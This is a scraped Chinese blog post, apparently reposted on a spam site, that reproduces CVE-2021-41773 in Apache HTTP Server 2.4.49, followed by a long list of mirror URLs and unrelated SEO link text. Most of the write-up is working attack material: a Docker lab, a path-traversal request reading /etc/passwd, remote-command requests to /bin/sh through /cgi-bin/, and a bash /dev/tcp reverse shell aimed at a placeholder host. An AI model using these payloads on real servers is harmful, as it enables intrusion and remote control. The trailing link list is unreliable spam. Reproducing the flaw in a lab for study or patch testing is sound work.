当前位置: 首页 > news >正文 选一个网站做seo网站开发公司凭证 news 2025/10/28 12:15:57 选一个网站做seo,网站开发公司凭证,wordpress设置置顶文章,传奇购买域名做网站简介#xff1a; Apache HTTP Server是一个开源、跨平台的Web服务器#xff0c;它在全球范围内被广泛使用。2021年10月5日#xff0c;Apache发布更新公告#xff0c;修复了Apache HTTP Server2.4.49中的一个路径遍历和文件泄露漏洞#xff08;CVE-2021-41773#xff09;。… 简介 Apache HTTP Server是一个开源、跨平台的Web服务器它在全球范围内被广泛使用。2021年10月5日Apache发布更新公告修复了Apache HTTP Server2.4.49中的一个路径遍历和文件泄露漏洞CVE-2021-41773。攻击者可以通过路径遍历攻击将 URL 映射到预期文档根目录之外的文件如果文档根目录之外的文件不受“requireall denied”访问控制参数的保护默认禁用则这些恶意请求就会成功。除此之外该漏洞还可能会导致泄漏 CGI 脚本等解释文件的来源。 漏洞描述 在对 Apache HTTP Server 2.4.49 中的路径规范化所做的更改中发现一个缺陷。穿越的目录允许被访问比如配置了Directory /Require all granted/Directory攻击者可能使用路径遍历攻击将 URL 映射到类似别名指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“require all denied”的保护则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本则可以允许远程执行代码。此问题仅影响 Apache 2.4.49而不影响早期版本。 CVE Record | CVEhttps://www.cve.org/CVERecord?idCVE-2021-41773 指纹app:“apache web server 2.4.49 2.4.50” 影响版本 Apache HTTP Server 2.4.49 漏洞复现 靶场准备 docker环境搭建: mkdir Dockerfile //在空目录里面创建Dockerfile目录 cd Dockerfile //进入Dockerfile目录 vi Dockerfile //创建文件Dockerfil并编写编辑DockerFile文件内容 FROM httpd:2.4.49RUN set -ex \ sed -i s|#LoadModule cgid_module modules/mod_cgid.so|LoadModule cgid_module modules/mod_cgid.so|g /usr/local/apache2/conf/httpd.conf \ sed -i s|#LoadModule cgi_module modules/mod_cgi.so|LoadModule cgi_module modules/mod_cgi.so|g /usr/local/apache2/conf/httpd.conf \ sed -i s|#Include conf/extra/httpd-autoindex.conf|Include conf/extra/httpd-autoindex.conf|g /usr/local/apache2/conf/httpd.conf \ cat /usr/local/apache2/conf/httpd.conf \| tr \n \r \| perl -pe s|Directory /.*?/Directory|Directory /\n AllowOverride none\n Require all granted\n/Directory|isg \| tr \r \n \| tee /tmp/httpd.conf \ mv /tmp/httpd.conf /usr/local/apache2/conf/httpd.conf 执行构建操作 docker build -t httpd:2.4.49rce . 运行docker: docker run -d -p 85:80 httpd:2.4.49rce 浏览器访问85端口出现“It works!”说明部署成功: poc 目录遍历POC: curl -v --path-as-is http://XXXXX:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd或者 GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 exp POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 Host: xx.xx.xx.xx:xx Content-Type: text/plain Content-Length: 8echo; id curl -s --path-as-is -d echo Content-Type: text/plain; echo; id xx.xx.xx.xx:xx/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh 反弹shell: POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 Host: 123.58.224.8:63275 Content-Type: text/plain Content-Length: 50echo; bash -c 0168-;exec 168/dev/tcp/xx.xx.xx.xx/xx;bash 168 168 2168 漏洞修复 升级Apache HTTP Server到最新版本 文章转载自: http://www.morning.sjwzl.cn.gov.cn.sjwzl.cn http://www.morning.hxcrd.cn.gov.cn.hxcrd.cn http://www.morning.dkslm.cn.gov.cn.dkslm.cn http://www.morning.wwdlg.cn.gov.cn.wwdlg.cn http://www.morning.dxpzt.cn.gov.cn.dxpzt.cn http://www.morning.cnhgc.cn.gov.cn.cnhgc.cn http://www.morning.rljr.cn.gov.cn.rljr.cn http://www.morning.dphmj.cn.gov.cn.dphmj.cn http://www.morning.mwjwy.cn.gov.cn.mwjwy.cn http://www.morning.xpzgg.cn.gov.cn.xpzgg.cn http://www.morning.tmlhh.cn.gov.cn.tmlhh.cn http://www.morning.plkrl.cn.gov.cn.plkrl.cn http://www.morning.mynbc.cn.gov.cn.mynbc.cn http://www.morning.dmzzt.cn.gov.cn.dmzzt.cn http://www.morning.qzxb.cn.gov.cn.qzxb.cn http://www.morning.rkfxc.cn.gov.cn.rkfxc.cn http://www.morning.wqpsf.cn.gov.cn.wqpsf.cn http://www.morning.qfrsm.cn.gov.cn.qfrsm.cn http://www.morning.rwjfs.cn.gov.cn.rwjfs.cn http://www.morning.ltkms.cn.gov.cn.ltkms.cn http://www.morning.jfqqs.cn.gov.cn.jfqqs.cn http://www.morning.qpsft.cn.gov.cn.qpsft.cn http://www.morning.xqmd.cn.gov.cn.xqmd.cn http://www.morning.wbfly.cn.gov.cn.wbfly.cn http://www.morning.bdzps.cn.gov.cn.bdzps.cn http://www.morning.qgfkn.cn.gov.cn.qgfkn.cn http://www.morning.coffeedelsol.com.gov.cn.coffeedelsol.com http://www.morning.xwlmr.cn.gov.cn.xwlmr.cn http://www.morning.kfjnx.cn.gov.cn.kfjnx.cn http://www.morning.hbhnh.cn.gov.cn.hbhnh.cn http://www.morning.cplym.cn.gov.cn.cplym.cn http://www.morning.dmjhp.cn.gov.cn.dmjhp.cn http://www.morning.tdcql.cn.gov.cn.tdcql.cn http://www.morning.ltkms.cn.gov.cn.ltkms.cn http://www.morning.dgpxp.cn.gov.cn.dgpxp.cn http://www.morning.yslfn.cn.gov.cn.yslfn.cn http://www.morning.yfcyh.cn.gov.cn.yfcyh.cn http://www.morning.tsnmt.cn.gov.cn.tsnmt.cn http://www.morning.dnzyx.cn.gov.cn.dnzyx.cn http://www.morning.knscf.cn.gov.cn.knscf.cn http://www.morning.bhjyh.cn.gov.cn.bhjyh.cn http://www.morning.qxycf.cn.gov.cn.qxycf.cn http://www.morning.kzpxc.cn.gov.cn.kzpxc.cn http://www.morning.zdnrb.cn.gov.cn.zdnrb.cn http://www.morning.hkgcx.cn.gov.cn.hkgcx.cn http://www.morning.ldspj.cn.gov.cn.ldspj.cn http://www.morning.tongweishi.cn.gov.cn.tongweishi.cn http://www.morning.nfpkx.cn.gov.cn.nfpkx.cn http://www.morning.rkdzm.cn.gov.cn.rkdzm.cn http://www.morning.pyxwn.cn.gov.cn.pyxwn.cn http://www.morning.yltnl.cn.gov.cn.yltnl.cn http://www.morning.kuaijili.cn.gov.cn.kuaijili.cn http://www.morning.krjrb.cn.gov.cn.krjrb.cn http://www.morning.lfmwt.cn.gov.cn.lfmwt.cn http://www.morning.tkjh.cn.gov.cn.tkjh.cn http://www.morning.rkdhh.cn.gov.cn.rkdhh.cn http://www.morning.mywmb.cn.gov.cn.mywmb.cn http://www.morning.yfstt.cn.gov.cn.yfstt.cn http://www.morning.csnch.cn.gov.cn.csnch.cn http://www.morning.lqlfj.cn.gov.cn.lqlfj.cn http://www.morning.rrgqq.cn.gov.cn.rrgqq.cn http://www.morning.cmzcp.cn.gov.cn.cmzcp.cn http://www.morning.ysmw.cn.gov.cn.ysmw.cn http://www.morning.wtsr.cn.gov.cn.wtsr.cn http://www.morning.gcszn.cn.gov.cn.gcszn.cn http://www.morning.hxcuvg.cn.gov.cn.hxcuvg.cn http://www.morning.frmmp.cn.gov.cn.frmmp.cn http://www.morning.xirfr.cn.gov.cn.xirfr.cn http://www.morning.gnkdp.cn.gov.cn.gnkdp.cn http://www.morning.gppqf.cn.gov.cn.gppqf.cn http://www.morning.ndngj.cn.gov.cn.ndngj.cn http://www.morning.pnjsl.cn.gov.cn.pnjsl.cn http://www.morning.hcbky.cn.gov.cn.hcbky.cn http://www.morning.rkrl.cn.gov.cn.rkrl.cn http://www.morning.fpxsd.cn.gov.cn.fpxsd.cn http://www.morning.cfrz.cn.gov.cn.cfrz.cn http://www.morning.kmqms.cn.gov.cn.kmqms.cn http://www.morning.qymqh.cn.gov.cn.qymqh.cn http://www.morning.nchsz.cn.gov.cn.nchsz.cn http://www.morning.kpbq.cn.gov.cn.kpbq.cn 查看全文 http://www.tj-hxxt.cn/news/256630.html 相关文章: 网站制作哪些类型百度推广关键词怎么优化 电子商务网站建设 精品课wordpress服务器要求 不知情的情况下帮别人做网站他违法dw旅游网站模板下载 唯品会官网一家做特卖的网站律师咨询免费24小时在线 如何将域名和网站绑定域名免费代理服务器proxy 云南旅游网站建设爱做网址 可以做很多个网站然后哭推广个性化定制网站 帝国网站管理系统后台eclassconfig.php不存在培训学校机构有哪些 网站域名邮箱做网站银川 自己做的网站申请软著微信网站开发详解 网站做专题提升权重下载小程序到微信 做时时的网站网站建设与维护案例 汽车保养网站模板深圳惠州网站建设公司 辽宁网站建设哪里好常见cms网站源码下载 湖南平台网站建设哪家好午夜资源站 6网站建设设计wordpress 页面 小工具 中贤建设集团网站wordpress 商城站下载 诸暨网站建设职高网站建设知识点 No家电网站建设wordpress文章编辑器插件 做网络的网站很重要吗怎样启动wordpress 中国最好的网站建设有哪些自己做网站平台 ui设计的网站百度怎么打广告 音乐 版权 做视频网站92号汽油价格最新 怎么进入网站管理系统以什么主题做网站好 网站运营工作的内容郑州seo顾问热狗hotdoger 安徽池州建设厅网站wordpress软件下载站主题 建设网站要求哪里备案百度竞价防软件点击软件 长春做网站哪个公司好html5游戏开发 一般做一个网站多少钱福州建站免费模板 做网站正规公司有没有专门做策划的公司
